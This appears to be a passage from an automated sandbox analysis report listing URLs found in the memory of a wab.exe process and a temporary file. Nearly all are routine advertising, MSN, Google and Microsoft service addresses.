              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.H
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhv7197.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv7197.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv7197.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv7197.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
              Source: bhv7197.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv7197.tmp.9.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/AAehR3S.svg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FAC
              Source: bhv7197.tmp.9.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
              Source: bhv7197.tmp.9.drString found in binary or memory: https://capturemedia-assets.com/
              Source: bhv7197.tmp.9.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.adnxs.com/v/s/215/trk.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/CommonDiagnostics.js?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=14512.30550
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=14512.30550
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-msa.png?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/jquery-1.12.4.1.min.js?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/knockout-3.4.2.js?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.taboola.com/TaboolaCookieSyncScript.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: bhv7197.tmp.9.drString found in binary or memory: https://clientconfig.microsoftonline-p.net
              Source: bhv7197.tmp.9.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/avatar.png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/bundle.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/fabric.min.css
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check(
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/botguard-scs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/botguard-scs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lifh
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 00000009.00000003.49624961996.00000000059B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://eb2.3lift.com/sync?
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-FRAr4b&Fr
              Source: bhv7197.tmp.9.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
              Source: bhv7197.tmp.9.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv7197.tmp.9.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv7197.tmp.9.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.coh
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coH
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 00000009.00000003.49627377448.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626710700.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626762184.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626930014.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627607503.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627438697.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626658498.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627734054.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626603872.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627476918.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627667653.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626819102.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626488283.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626876567.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49635884632.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627542397.00000000059B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ib.3lift.com/sync.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ib.adnxs.com/
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IMai
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IQAK
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLcTb?ver=b557
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://(
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pah
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie(
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49624792000.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
